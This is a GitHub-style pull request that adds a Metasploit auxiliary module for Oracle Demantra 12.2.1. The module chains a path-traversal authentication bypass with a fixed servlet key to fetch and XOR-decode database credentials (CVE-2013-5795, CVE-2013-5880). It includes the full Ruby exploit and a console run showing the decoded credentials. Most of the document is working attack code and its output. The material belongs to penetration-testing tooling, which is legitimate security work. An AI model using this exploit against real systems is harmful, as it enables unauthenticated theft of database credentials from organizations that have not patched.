### PR TITLE
Add Oracle Demantra 2013-5795 (Database Credentials Retrieval)

### DIFF
--- a/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb
+++ b/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb
@@ -1,0 +1,75 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Oracle Demantra Database Credentials Leak',
+      'Description'    => %q{
+       This module exploits a database credentials leak found in Oracle Demantra 12.2.1 in combination with an authentication bypass.
+       This way an unauthenticated user can retreive the database name, username and password on any vulnerable machine.
+      },
+      'References'     =>
+        [
+          [ 'CVE', '2013-5795'],
+          [ 'CVE', '2013-5880'],
+          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5795/'],
+          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5880/' ]
+        ],
+      'Author'         =>
+        [
+          'Oliver Gruskovnjak'
+        ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => "February 28 2014"
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptBool.new('SSL',   [false, 'Use SSL', false])
+      ], self.class)
+
+    deregister_options('RHOST')
+  end
+
+  def run_host(ip)
+    authbypass = "/demantra/common/loginCheck.jsp/../../"
+    staticUAK = "ServerDetailsServlet?UAK=406EDC5447A3A43551CDBA06535FB6A661F4DC1E56606915AC4E382D204B8DC1"
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri("#{authbypass}", "#{staticUAK}")
+    })
+
+
+    if res.nil? or res.body.empty?
+      fail_with("No content retrieved from: #{ip}")
+    end
+
+    if res.code == 404
+      print_error("#{rhost}:#{rport} - File not found")
+      return
+    end
+
+    if res.code == 200
+      print_status("#{ip}:#{rport} returns: #{res.code.to_s}")
+
+      creds = ""
+      print_status("String received: #{res.body.to_s}")
+      res.body.to_s.split(",").each do|c|
+        i = c.to_i ^ 0x50
+        creds += i.chr
+      end
+      print_good("Credentials decoded: #{creds}")
+    end
+  end
+end


### PR DESCRIPTION
This module exploits a credentials leak in oracle demantra. The exploit also abuses an authentication bypass so that it can be exploited without proper credentials.

msf > use auxiliary/scanner/http/oracle_demantra_database_credentials_leak 
msf auxiliary(oracle_demantra_database_credentials_leak) > show options

Module options (auxiliary/scanner/http/oracle_demantra_database_credentials_leak):

   Name     Current Setting  Required  Description

---

   Proxies                   no        Use a proxy chain
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    8080             yes       The target port
   SSL      false            no        Use SSL
   THREADS  1                yes       The number of concurrent threads
   VHOST                     no        HTTP server virtual host

msf auxiliary(oracle_demantra_database_credentials_leak) > set rhosts 10.1.10.13
rhosts => 10.1.10.13
msf auxiliary(oracle_demantra_database_credentials_leak) > exploit

[_] 10.1.10.13:8080 returns: 200
[_] String received: 4,21,3,4,111,36,53,35,36,111,52,53,61,49,62,36,34,49,111,63,34,51,111,97,
[+] Credentials decoded: TEST?test?demantra?orc?1
[_] Scanned 1 of 1 hosts (100% complete)
[_] Auxiliary module execution completed

The pcap dump can be found at:
https://github.com/0x3fcoma/Random/blob/master/oracle_database_cred_leak.pcap

I hope that this will be an easier review than my first module.
